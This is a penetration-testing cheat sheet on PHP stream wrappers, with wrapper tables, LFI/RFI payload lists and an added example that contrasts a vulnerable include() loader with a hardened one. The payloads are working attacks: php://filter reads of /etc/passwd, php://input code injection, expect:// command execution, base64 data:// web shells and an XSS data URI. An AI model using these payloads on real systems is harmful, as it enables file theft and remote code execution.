Wrappers
Resource
Global Wrappers (General Resource Access)
| Wrapper | Description |
|---|---|
| php:// | Access to the PHP I/O streams (php://stdin, php://input, php://memory, php://temp, php://filter, ...) |
| data:// | Embed data directly in the URI (RFC 2397; plain text or Base64) |
| file:// | Access to local files and directories (the default when no scheme is given) |
| zip:// | Access files inside a ZIP archive (requires the zip extension) |
| glob:// | Find pathnames matching a pattern |
| phar:// | Access files inside a PHAR archive (PHp ARchive) |
Network Wrappers (Application Protocols)
| Wrapper | Description |
|---|---|
| http(s):// | Access resources via HTTP or HTTPS (needs allow_url_fopen=On; allow_url_include=On for include()/require()) |
| ftp:// | Access files on an FTP server (also needs allow_url_fopen=On) |
| ws(s):// | WebSocket URL scheme; not a PHP stream wrapper (it is the browser's `new WebSocket()` target), listed here because it shows up in SSRF targets |
| gopher:// | Gopher servers (obsolete document retrieval protocol); not a PHP stream wrapper, but supported by cURL, hence useful when the target passes the URL to curl_exec() |
| dict:// | Query dictionary servers with the DICT protocol (RFC 2229); same remark as gopher://, cURL only |
Transport Wrappers (Low-Level Connection)
| Wrapper | Description |
|---|---|
| tcp:// | Opens a TCP connection (the transport under HTTP, SMTP, etc.) |
| udp:// | Opens a UDP connection (stateless datagrams) |
| ssl:// / tls:// | TLS-wrapped TCP connection (requires the OpenSSL extension) |
| ssh2.*:// | ssh2.shell://, ssh2.exec://, ssh2.tunnel://, ssh2.sftp://, ssh2.scp:// from the PECL ssh2 extension (SSH version 2) |
Socket target format: {PROTOCOL}://{DOMAIN or IP}:{PORT}
```php
# Example: which PHP functions accept which wrappers
# stream_socket_client() / stream_socket_server() => tcp://, udp://, ssl://, tls://, unix://
# file_get_contents(), fopen(), include(), require() => http(s)://, php://, data://, file://, ftp://, zip://, phar://, glob://, ssh2.* (PECL)
# ws(s):// is not a PHP stream wrapper: it is the URL scheme of the browser's new WebSocket() in JavaScript
```
data wrapper (RFC 2397)
```php
# Base64-encoded text
# data:text/plain;base64,aGVsbG8gd29ybGQ=                      => "hello world"
# HTML that runs JavaScript when a browser renders the URI (must be text/html, not text/plain)
# data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==   => <script>alert(1)</script>
```
PHP - Wrappers
php:// is a wrapper for accessing various I/O streams (php://stdin, php://input, php://memory, php://filter, ...). The wrappers registered in the running build can be listed with:
```php
print_r(stream_get_wrappers()); # list registered wrappers
```
| Command | Description |
|---|---|
| php://filter/convert.base64-encode/resource=/etc/passwd | Read a file through the filter wrapper and Base64-encode it; through include() the Base64 text contains no `<?php` tag, so the PHP source is echoed instead of executed |
| php://filter/resource=https://google.com | Filter wrapper over a remote http(s):// resource (needs allow_url_fopen=On) |
| curl -s -X POST --data "<?php echo base64_encode(file_get_contents('index.php')); ?>" "http://exemple.com/index.php?lang=php://input" | Send the PHP payload in the POST body; include('php://input') executes it (needs allow_url_include=On) |
| curl -s "http://127.0.0.1/index.php?language=expect://ls" | expect:// (PECL expect extension, rarely installed) runs a command through a PTY |
Payload execution with file_get_contents, require, include
```php
# allow_url_fopen = Off (php.ini): file_get_contents()/fopen() refuse remote URLs (http(s)://, ftp://); local wrappers still work.
# allow_url_include = Off (the default): include()/require() refuse http(s)://, ftp://, data://, php://input; php://filter, file://, zip://, phar:// still work.
# file_get_contents() returns the bytes as data and never executes them (even PHP code). => path traversal / arbitrary file read
# include() and require() execute whatever the stream returns. => LFI, and RFI when allow_url_include is On
# php://filter returns the (filtered) source instead of running the file; with include(), Base64 output has no <?php tag, so it is printed verbatim.
```
See more: LFI RFI exploit
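Added example, not code from the original page: the same user-controlled `page` parameter passed straight to include(), beside a hardened loader that refuses wrapper schemes, whitelists the page name and confines the resolved path, plus a small audit helper that reports stream_get_wrappers() and the two php.ini switches. The /var/www/app/pages directory, the `page` parameter and the `<name>.php` template naming are assumptions made for the example.

```php
<?php
// Added example (not from the original page). Assumptions (hypothetical):
// templates live under /var/www/app/pages as <name>.php, request parameter ?page=.
declare(strict_types=1);

// Vulnerable: every registered stream wrapper is honoured by include().
//   ?page=php://filter/convert.base64-encode/resource=index.php       -> source leak
//   ?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2B
//        (only with allow_url_include=On)                               -> code execution
//   ?page=../../../../etc/passwd                                         -> file read
function loadPageVulnerable(string $page): void
{
    include $page;
}

// Hardened: no wrapper syntax reaches include(), the name must match a strict
// pattern, and the canonical path must stay inside $base.
function loadPageSafe(string $page, string $base = '/var/www/app/pages'): void
{
    // 1. Reject anything shaped like a wrapper or URL scheme ("xxx://").
    if (preg_match('#^[a-z0-9.+-]+://#i', $page)) {
        throw new InvalidArgumentException('stream wrappers are not allowed');
    }
    // 2. Plain identifiers only: no slashes, dots or NUL bytes (this alone also
    //    excludes "://"; step 1 just yields a clearer error for audits/logs).
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $page)) {
        throw new InvalidArgumentException('invalid page name');
    }
    // 3. Resolve symlinks and confirm the result is still under $base.
    $target = realpath($base . '/' . $page . '.php');
    $root   = realpath($base);
    if ($target === false || $root === false
        || strncmp($target, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        throw new RuntimeException('page not found');
    }
    include $target;
}

// Audit helper: which wrappers this build registers and whether remote ones
// can be fed to fopen()-style functions or to include()/require().
function wrapperReport(): array
{
    return [
        'wrappers'          => stream_get_wrappers(),
        'allow_url_fopen'   => filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN),
        'allow_url_include' => filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN),
    ];
}

if (PHP_SAPI === 'cli') {
    print_r(wrapperReport());
    // Source leak through php://filter, shown on this very script: the stream
    // yields Base64 text with no "<?php" tag, so include() would echo it and
    // file_get_contents() returns the same bytes. Decoding gives the source.
    $leaked = file_get_contents('php://filter/convert.base64-encode/resource=' . __FILE__);
    echo substr(base64_decode($leaked), 0, 40), PHP_EOL;
}
// Typical controller wiring (web SAPI):
//   $page = $_GET['page'] ?? 'home';
//   if (!is_string($page)) { http_response_code(400); exit; }
//   loadPageSafe($page);
```

Run it from the command line to see the wrapper list of the local PHP build and the Base64 filter trick applied to the script itself; in a web context only loadPageSafe() should ever be wired to request input.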
Payloads
```bash
# XSS payload (the browser must render it as text/html; as text/plain the script tag is displayed, not run)
# data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
# Command execution via LFI (only include()/require() execute the stream; needs allow_url_include=On)
# data:application/x-httpd-php;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2B   : decodes to <?php system($_GET['cmd']); ?>, web shell called with &cmd=id
# data:text/plain,<?php echo shell_exec($_GET['cmd']); ?>                          : same, unencoded (URL-encode it inside the query string)
# Read a file (deflate first so the Base64 output is shorter)
# php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
# Chaining wrappers: php://filter on top of file://
# php://filter/convert.base64-encode/resource=file:///etc/passwd
```
Wrappers Payloads
```bash
# zip://  : archive path, then the member name after a URL-encoded '#' (%23); the archive must already be on disk
zip://malicious.zip%23exec.php&cmd=ls
# expect:// : command execution, only if the PECL expect extension is loaded
http://example.com/?page=expect://ls
# glob:// : directory listing through a pattern
glob:///etc/*
# file:// : local file read
file:///etc/passwd
# gopher:// and dict:// : not PHP stream wrappers; reachable when the target hands the URL to cURL (SSRF)
gopher://gopher.floodgap.com
dict://dict.org/d:$word   # replace $word by the term to look up
```